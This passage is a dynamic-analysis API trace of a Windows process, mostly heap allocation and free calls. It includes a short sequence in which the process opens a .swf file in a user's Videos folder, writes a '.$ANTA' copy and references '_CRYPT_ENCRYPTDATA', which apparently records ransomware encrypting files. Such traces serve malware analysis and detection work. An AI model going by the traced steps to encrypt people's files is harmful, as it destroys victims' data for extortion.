lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.714] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0103.714] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0103.714] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\wfup9i.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0103.715] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.715] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0103.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0103.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0103.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.716] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0103.716] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0103.716] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0103.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0103.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0103.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0103.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0103.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0103.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a84d8 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4ae0 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a84d8 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0103.718] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca")) returned 0x10 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0103.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4ae0 | out: hHeap=0x1780000) returned 1 [0103.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0103.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0103.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.719] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\wfup9i.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0103.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0103.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.720] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0103.720] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0103.720] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0103.720] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0103.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0103.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0103.725] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0103.725] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0103.727] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x8cfb, lpOverlapped=0x0) returned 1 [0103.728] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0103.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18cfb) returned 0x4516010 [0103.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0103.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0103.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0103.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18cfb) returned 0x452ed18 [0103.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0103.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.732] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18cfb) returned 0x4516010 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.733] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0103.733] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0103.734] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0103.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0103.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: 